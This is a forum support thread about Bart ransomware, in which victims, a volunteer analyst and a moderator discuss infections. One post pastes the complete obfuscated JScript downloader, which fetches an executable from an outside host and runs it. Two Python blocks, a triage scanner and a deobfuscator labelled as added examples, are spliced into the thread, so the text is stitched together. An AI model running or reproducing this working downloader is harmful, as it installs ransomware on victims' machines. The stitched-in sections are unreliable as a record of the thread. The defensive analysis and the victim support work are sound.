Bart Ransomware Help & Support (.bart.zip, recovery.txt)


37 replies to this topic

#1 Demonslay335 (Ransomware Hunter, Security Colleague)

Posted 24 June 2016 - 04:40 PM

A new ransomware by the name Bart was reported today by Proofpoint.

Victims' files are encrypted by using third-party software to compress each file into a password-protected ZIP file, and the extension ".bart.zip" is appended.

It appears this ransomware is spread by the same vectors as Locky, and appears to mimic it.

The following ransom note is displayed, and is also saved to the desktop as "recovery.txt".

[image: bart-2.png, the Bart ransom note]

 

 

For more details, Proofpoint has an excellent article on this ransomware: https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky

 

Analysis is still underway on this malware.


ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]
RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]
CryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.
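As an added example (not part of the original post or of any tool named in it), a small triage script for the artifacts the post describes: Bart packs each file into a password-protected ZIP named *.bart.zip and drops recovery.txt, so a responder can confirm an artifact without any password by reading the ZIP local file header, where bit 0 of the general-purpose flag marks an encrypted entry and compression method 99 marks the WinZip AES extension rather than traditional ZipCrypto. The directory walk, the constructed sample archive and the helper names are this example's own assumptions.

```python
"""Triage helper for Bart-style ".bart.zip" artifacts (added example)."""
import io
import struct
import tempfile
import zipfile
from pathlib import Path

BART_SUFFIX = ".bart.zip"
NOTE_NAME = "recovery.txt"
LOCAL_HEADER_SIG = b"PK\x03\x04"
FLAG_ENCRYPTED = 0x0001   # general-purpose bit 0: entry is encrypted
METHOD_AES = 99           # compression-method value used by WinZip AES (AE-x)


def entry_encryption(data: bytes) -> dict:
    """Parse the first ZIP local file header and report its encryption state."""
    if len(data) < 30 or data[:4] != LOCAL_HEADER_SIG:
        raise ValueError("not a ZIP local file header")
    # offsets 4..9: version needed, general-purpose flags, compression method
    _version, flags, method = struct.unpack_from("<HHH", data, 4)
    name_len, _extra_len = struct.unpack_from("<HH", data, 26)
    name = data[30:30 + name_len].decode("utf-8", "replace")
    return {
        "name": name,
        "encrypted": bool(flags & FLAG_ENCRYPTED),
        "aes": method == METHOD_AES,
        "method": method,
    }


def scan_tree(root: str) -> dict:
    """Find *.bart.zip artifacts and recovery.txt notes under root."""
    result = {"encrypted": [], "not_encrypted": [], "unparsable": [], "notes": []}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.name.lower() == NOTE_NAME:
            result["notes"].append(str(path))
        elif path.name.lower().endswith(BART_SUFFIX):
            with open(path, "rb") as fh:
                head = fh.read(64 * 1024)   # the local header sits at the start
            try:
                info = entry_encryption(head)
            except ValueError:
                result["unparsable"].append(str(path))
                continue
            key = "encrypted" if info["encrypted"] else "not_encrypted"
            result[key].append((str(path), info["name"], info["aes"]))
    return result


def make_sample(encrypted: bool) -> bytes:
    """Constructed sample: a one-entry ZIP, optionally with the encryption flag set.

    Python's zipfile cannot write password-protected archives, so the flag is
    set by hand in the local header to mimic a ZipCrypto-protected entry.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.docx", b"x" * 128)
    raw = bytearray(buf.getvalue())
    if encrypted:
        (flags,) = struct.unpack_from("<H", raw, 6)
        struct.pack_into("<H", raw, 6, flags | FLAG_ENCRYPTED)
    return bytes(raw)


def demo() -> dict:
    """Write constructed artifacts into a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="bart-demo-")
    Path(root, "report.xlsx" + BART_SUFFIX).write_bytes(make_sample(True))
    Path(root, "Desktop").mkdir()
    Path(root, "Desktop", NOTE_NAME).write_text("constructed ransom note\n")
    Path(root, "notes.txt").write_bytes(b"untouched")
    return scan_tree(root)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

The flag check is deliberately password-free: it only tells you that an entry is encrypted and whether the archive used AES (method 99) or ZipCrypto, which is the information worth collecting before anyone spends effort on recovery.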



#2 SilentRage47 (Member)

Posted 24 June 2016 - 05:31 PM

This happened today on a laptop in my company; no payment page or recovery.txt file in my case. I can upload an example of a .bart file if necessary.



#3 BryanOraza (Member)

Posted 25 June 2016 - 03:43 AM

Yes! That was so annoying! I want to bang my head against the wall. It is happening here at my work right now. -_-

Suspicious sender and suspicious email format.

I hope the solution comes faster.
 


Edited by BryanOraza, 25 June 2016 - 03:49 AM.


#4 Demonslay335 (Ransomware Hunter, Security Colleague, Topic Starter)

Posted 25 June 2016 - 09:48 AM

Do you have the suspicious email still? I may be interested in an original infectious attachment.



#5 SilentRage47 (Member)

Posted 25 June 2016 - 10:24 AM

I do; how can I forward it to you?

By the way, is it safe to use the infected computer on a LAN? Is there a possibility that the virus is still active?



#6 Demonslay335 (Ransomware Hunter, Security Colleague, Topic Starter)

Posted 25 June 2016 - 10:49 AM

I would definitely scan the system with your antivirus, as well as Malwarebytes and HitmanPro. Typically ransomware will remove itself after encrypting. I have not done extended analysis on this variant myself, so I do not know if it persists. It may set itself as a startup. Malwarebytes would be able to pick up on any duplicates of itself and Run keys.




#7 BryanOraza (Member)

Posted 26 June 2016 - 08:00 PM

> I would definitely scan the system with your antivirus, as well as Malwarebytes and HitmanPro. Typically ransomware will remove itself after encrypting. I have not done extended analysis on this variant myself, so I do not know if it persists. It may set itself as a startup. Malwarebytes would be able to pick up on any duplicates of itself and Run keys.

Can we send it to you?

Your email? So I can forward the message.



#8 Demonslay335 (Ransomware Hunter, Security Colleague, Topic Starter)

Posted 26 June 2016 - 08:45 PM

We have several samples now, thank you. If a weakness is found, victims will be contacted. It's above me to analyze it further, so we'll have to see what the experts can find hopefully.



#9 BryanOraza (Member)

Posted 26 June 2016 - 08:55 PM

> We have several samples now, thank you. If a weakness is found, victims will be contacted. It's above me to analyze it further, so we'll have to see what the experts can find hopefully.

Looking forward to retrieving my client's files. Please let us know if there's a solution to our problem. TIA



#10 Letouane (Member)

Posted 27 June 2016 - 02:28 PM

One of my clients got infected by this virus.

I have taken the virus itself; here you will find the virus code (admins can moderate if necessary).

Maybe the code will help some security researcher, or anyone, with decrypting, or put an end to the target server listed at the bottom of the script.

// Analyst annotation (comments added to the posted sample; the code itself is
// unchanged): this is the JScript downloader that fetches and runs the Bart
// payload under Windows Script Host. Strings are hidden two ways:
//   miami4()  strips every "archives" filler and base64-decodes the remainder
//   miami()   applies the substitution table `unlike` (':'->'.', 'U'->'S',
//             '381'->'X') via String.replace, which hits the first match only
// Comma-expression lists such as ("boobs", ..., "exe") evaluate to their last
// element. a(), Point.*, Native.* and the "_F2_"-style assignments are dead
// padding. Decoded, the script does:
//   shell = new ActiveXObject("WScript.Shell"); http = new ActiveXObject("MSXML2.XMLHTTP")
//   tmp   = shell.ExpandEnvironmentStrings("%TEMP%")
//   http.open("GET", url, false); http.send()
//   if (WScript == "Windows Script Host" && http.status == 200) {
//     s = new ActiveXObject("ADODB.Stream"); s.open(); s.type = 1 (binary)
//     s.write(http.ResponseBody); s.position = 0; s.saveToFile(tmp + "/DNnFeLFf.exe", 2)
//     s.close(); shell.Run(tmp + "/DNnFeLFf.exe", 1, true)
//   }
  relevant = [];

var unlike = { ':': '.','U': 'S','381': 'X'};
	var errant = 0;


function a(b){if(b==1){return 2;}else{return 17;}
return 3;}
 function miami(rivulet) {
	request = rivulet;
	for (var i in unlike){request = request.replace(i, unlike[i]);}
    return request;
};

var chosen = 3-2;  
function Point(x, y) {
    this.x = x || 0;
    this.y = y || 0;
}

Point.create = function(o, y) {
    if (isArray(o)) return new Point(o[0], o[1]);
    if (isObject(o)) return new Point(o.x, o.y);
    return new Point(o, y);
};

Point.add = function(p1, p2) {
    return new Point(p1.x + p2.x, p1.y + p2.y);
};

Point.subtract = function(p1, p2) {
    return new Point(p1.x - p2.x, p1.y - p2.y);
};

Point.scale = function(p, scaleX, scaleY) {
    if (isObject(scaleX)) {
        scaleY = scaleX.y;
        scaleX = scaleX.x;
    } else if (!isNumber(scaleY)) {
        scaleY = scaleX;
    }
    return new Point(p.x * scaleX, p.y * scaleY);
};

Point.equals = function(p1, p2) {
    return p1.x == p2.x && p1.y == p2.y;
};

Point.angle = function(p) {
    return Math.atan2(p.y, p.x);
};

var libel = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57,
    58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6,
    7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
    25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
    37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
String.prototype.miami4 = function() {
	
    var c1, c2, c3, c4;
    var i, len, out;
	var str = this.replace(/archives/g, '')
    len = str.length;
    i = 0;
    out = "";

    while (i < len) {
        do {
            c1 = libel[str.charCodeAt(i++) & 0xff]
        } while (i < len && c1 == -1);

        if (c1 == -1)
            break;
var dodo = false;
        do {
            c2 = libel[str.charCodeAt(i++) & 0xff];
		dodo = i < len && c2 == -1;
        } while (dodo);

        if (c2 == -1)
            break;

        out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

        do {
            c3 = str.charCodeAt(i++) & 0xff;

            if (c3 == 61)
                return out;

            c3 = libel[c3]
        } while (i < len && c3 == -1);

        if (c3 == -1)
            break;

        out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

        do {
            c4 = str.charCodeAt(i++) & 0xff;

            if (c4 == 61)
                return out;

            c4 = libel[c4]
        } while (i < len && c4 == -1);

        if (c4 == -1)
            break;

        out += String.fromCharCode(((c3 & 0x03) << 6) | c4)
    }

    return out
}


var ranger ="archivesarchivesJVarchivesRFTVarchivesAl".miami4();                                   // "%TEMP%"
var ungodly = "archivesarchivesQWarchivesN0aXZarchiveslWE9iaarchivesmVjdA=archives=".miami4();   // "ActiveXObject"
String.prototype.miami2 = function () {
    var trials = {
        pitiable: this
    };
    trials.puerto = trials.pitiable["c3Varchivesic3RyarchivesaW5archivesn".miami4()](errant, chosen);   // "substring"(0, 1): first character
    return trials.puerto;
};

var workroom ="archivesRXhwYW5archiveskRW52aXarchivesJvbm1lbnRTdHJarchivespbmdz".miami4();   // "ExpandEnvironmentStrings"
var Native = function(options){
	
};Native.implement = function(objects, properties){
	for (var i = 0, l = objects.length; i < l; i++) objects[i].implement(properties);
};

// unrestrained = ["ActiveXObject", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run",
//                 "MSXML2.XMLHTTP>WScript.Shell"]   (the last one after miami()'s substitutions)
var unrestrained = [ungodly, workroom,ranger,  ""+"."+("boobs","susan","leprosy","passerby","assistance","dressing","abroad","advised","exe"), "UnarchivesVuarchives".miami4(), miami("M"+"SX"+"ML"+("grenada","cannibal","auction","katrina","senegal","phosphorescent","canteen","2.")+"381M"+"LH"+"TT"+("allocation","synonym","materials","sighting","spicy","spalding","apricot","impede","P>")+"WU"+("adjustable","lapland","organize","colon","tease","amateur","chronic","cr")+("betide","mention","townships","spice","atkins","spectrum","horde","frenchwoman","ip")+"t:"+("cassandra","beaches","baptize","casting","ravens","unwieldy","bramble","subaltern","Sh")+"ell")];
fabled = "_F2_";
var logan = this[unrestrained.shift()];   // logan = ActiveXObject

Native.genericize = function(object, property, check){
	if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){
		var args = Array.prototype.slice.call(arguments);
		return object.prototype[property].apply(args.shift(), args);
	};
};
Native.typize = function(object, family){
	if (!object.type) object.type = function(item){
		return ($type(item) === family);
	};
};
inXiXQc = "VepXOp";
casque = (("optics", "detailed", "unconnected", "runaway", "leaflet", "cause", "workroom", "pyYDHQfX") + "PkAkGdUV").miami2();                                   // "p"
inflammation = (("bushel", "toilet", "mutter", "masque", "fittest", "vagina", "feeder", "pusillanimous", "solidity", "sWVCpYbGGt") + "gotWpR").miami2();   // "s"
  
    String.prototype.singing = function (a) {
        for (var b = [], c = 0; c < a.length; c++)b[c] = a[c];
        return b.join("")
    };

var terrifying = unrestrained.pop().split(">");   // ["MSXML2.XMLHTTP", "WScript.Shell"]

var rampart = new logan(terrifying[1]);           // new ActiveXObject("WScript.Shell")
var selecting = new logan(terrifying[0]);         // new ActiveXObject("MSXML2.XMLHTTP")
var vulture = rampart[unrestrained.shift()](unrestrained.shift());   // ExpandEnvironmentStrings("%TEMP%")
weasel = "E";

var amalgamation = unrestrained.shift();          // ".exe"
var promises = unrestrained.shift();              // "Run"
architectural = "b3Blbg==".miami4();              // "open"
// school(url, name): download url to %TEMP%/<name>.exe and execute it
function school(gutter, reverse) {

    try {
        var appropriations = vulture + "/" + reverse ;
		appropriations = appropriations+ amalgamation;   // "%TEMP%/<name>.exe"
            selecting[architectural](("eileen","brush","myrtle","historically","compute","conduct","transform","correcting","G" + weasel) + ("secretive","sensitive","foundry","baptize","jewel","endurable","testing","college","interposition","quantity","T"), gutter, false);   // open("GET", url, false)
       
    selecting[inflammation + ("seasoned","sawdust","end")]();   // send()
	// Environment check: proceed only under Windows Script Host (the WScript object's
	// default value is "Windows Script Host") with HTTP status 200; typeof GzEAPd is always undefined.
	var advocacy=("casque" + WScript=="casque" + "V2luZGarchives93cyBTY3JpcHQgarchivesSG9zdA=archives=".miami4())&&selecting["c3archivesRhdHarchivesVz".miami4()] +""=="MjarchivesAw".miami4()&&typeof(GzEAPd)==="undefined";

    if (advocacy) {
		
        var brings = new logan((("lancaster","articles","seaport","carbide","interact","chevy","absorption","queens","A")+("light","vagina","confidentially","syndication","symmetrical","dubious","backup","lauren","SEOO")+"DB"+("garrulous","poker","hotel","worshiped","ceres","provision","nauseous",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));   // new ActiveXObject("ADODB.Stream")
        brings[architectural]();                  // open()
        RhXxGud = "_F9_";
        brings.type = chosen;                     // 1 = adTypeBinary
        hGaSMa = "_F10_";
        brings["d3JarchivespdGU=archives".miami4()](selecting[("somewhat","alienate","flirt","conjugal","determinate","certification","requital","")+"R"+"es"+"pon"+unlike['U'].toLowerCase()+"e"+"Qarchivesm9keQ=archives=".miami4()]);   // write(ResponseBody)
        XWaxeQhw = "_F11_";
        brings[(casque + "o"+("moments","plaudits","pertinent","websites","buffet","ahead","queue","diable","00")+("experts","pencil","bonus","abstracts","inspection","primate","price","8i")+"tion").replace("0"+("contrast","stupefaction","shannon","dally","ailing","deferred","newton","08"), inflammation)] = 0;   // position = 0
        krDwvrh = "_F12_";
        brings.saveToFile(appropriations, 2);     // 2 = adSaveCreateOverWrite
        SswQdi = "_F13_";
        brings.close();
        XWfgMW = "_F14_";
		rampart[promises](appropriations, chosen, true);   // WScript.Shell.Run(path, 1, true)
    }
} catch (fbhBGzsX) {
    KKKnoPGE = "_F15_"; };

}
// Entry point. The URL decodes to hxxp://camera-test[.]hi2[.]ro/89ug6b7ui?QszlYY=qVWJWXJ
// (\u006D = 'm', \u002D = '-', \u002F = '/'); the payload is saved as %TEMP%/DNnFeLFf.exe.
try{
school("http://"+"ca\u006Dera\u002Dtest"+".hi2.ro\u002F89ug6b7ui" + "?QszlYY=qVWJWXJ","DNnFeLFf");}catch(UKhpApne){
   LyzGRySP = "_F16_";}
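As an added example (not the poster's code and not part of the sample), the string hiding in the script above can be replayed offline in Python to recover what the downloader actually calls: miami4() deletes every occurrence of the filler word "archives" and base64-decodes the rest, miami() applies String.replace() with the table {':': '.', 'U': 'S', '381': 'X'} (first match only, as in JScript), and miami2() is substring(0, 1). The encoded literals in SAMPLE and the ProgID string are copied from the post; the helper and label names are this example's own.

```python
"""Static string recovery for the posted JScript downloader (added example)."""
import base64
import re

FILLER = "archives"
SUBST = {":": ".", "U": "S", "381": "X"}   # the sample's `unlike` table

# Encoded literals copied verbatim from the posted script (label -> literal).
SAMPLE = {
    "ranger": "archivesarchivesJVarchivesRFTVarchivesAl",
    "ungodly": "archivesarchivesQWarchivesN0aXZarchiveslWE9iaarchivesmVjdA=archives=",
    "substring": "c3Varchivesic3RyarchivesaW5archivesn",
    "workroom": "archivesRXhwYW5archiveskRW52aXarchivesJvbm1lbnRTdHJarchivespbmdz",
    "run": "UnarchivesVuarchives",
    "open": "b3Blbg==",
    "host": "V2luZGarchives93cyBTY3JpcHQgarchivesSG9zdA=archives=",
    "status": "c3archivesRhdHarchivesVz",
    "ok": "MjarchivesAw",
    "write": "d3JarchivespdGU=archives",
    "body": "Qarchivesm9keQ=archives=",
}
# The miami() argument with its comma-expression decoys reduced to their last
# element, i.e. the sample's own string pieces concatenated in order.
PROGIDS = "MSXML2.381MLHTTP>WUcript:Shell"


def miami4(s: str) -> str:
    """Replay String.prototype.miami4: strip filler, then base64-decode.

    The sample's decoder skips characters outside its alphabet and treats '='
    as end of data, so stray '=' signs mid-string are harmless; rebuild the
    padding instead of trusting what is there.
    """
    body = re.sub(r"[^A-Za-z0-9+/]", "", s.replace(FILLER, ""))
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body).decode("latin-1")


def miami(s: str) -> str:
    """Replay miami(): JS String.replace(string, string) hits the FIRST match only."""
    for old, new in SUBST.items():
        s = s.replace(old, new, 1)
    return s


def miami2(s: str) -> str:
    """Replay String.prototype.miami2: substring(0, 1)."""
    return s[:1]


def decode_sample() -> dict:
    """Decode every literal in SAMPLE."""
    return {label: miami4(lit) for label, lit in SAMPLE.items()}


def activex_progids() -> list:
    """Recover the two ProgIDs the sample instantiates (it splits on '>')."""
    return miami(PROGIDS).split(">")


def harvest(script: str) -> list:
    """Pull every "...".miami4() call out of raw script text and decode it."""
    return [miami4(m.group(1))
            for m in re.finditer(r'"([A-Za-z0-9+/=]+)"\.miami4\(\)', script)]


if __name__ == "__main__":
    for label, value in decode_sample().items():
        print(f"{label:10s} -> {value!r}")
    print("ProgIDs   ->", activex_progids())
    # Method names assembled from a miami2() first character plus literal tails
    print("send      ->", miami2("sWVCpYbGGtgotWpR") + "end")
    print("position  ->", ("po" + "00" + "8i" + "tion").replace("008", miami2("sWVCpYbGGtgotWpR")))
```

harvest() takes the raw script text, so the same three helpers recover the strings from any sibling sample that reuses this encoder with a different filler word once FILLER is adjusted.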

   


#11 BryanOraza (Member)

Posted 28 June 2016 - 04:11 AM

Up to this.



#12 BryanOraza (Member)

Posted 29 June 2016 - 12:48 AM

^up I really need help with this issue.



#13 quietman7 (Bleepin' Janitor, Global Moderator)

Posted 29 June 2016 - 06:18 AM

When or if a solution is found, that information will be provided in this support topic and you will receive notification if subscribed to it. In addition, a news article most likely will be posted on the BleepingComputer front page.
Microsoft MVP Consumer Security 2007-2015
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click here.

#14 BryanOraza (Member)

Posted 30 June 2016 - 04:33 AM

> When or if a solution is found, that information will be provided in this support topic and you will receive notification if subscribed to it. In addition, a news article most likely will be posted on the BleepingComputer front page.

Thanks. I thought I needed to make it up. I hope it will help us soon. Thank you very much.



#15 quietman7 (Bleepin' Janitor, Global Moderator)

Posted 30 June 2016 - 05:06 AM

You're welcome.



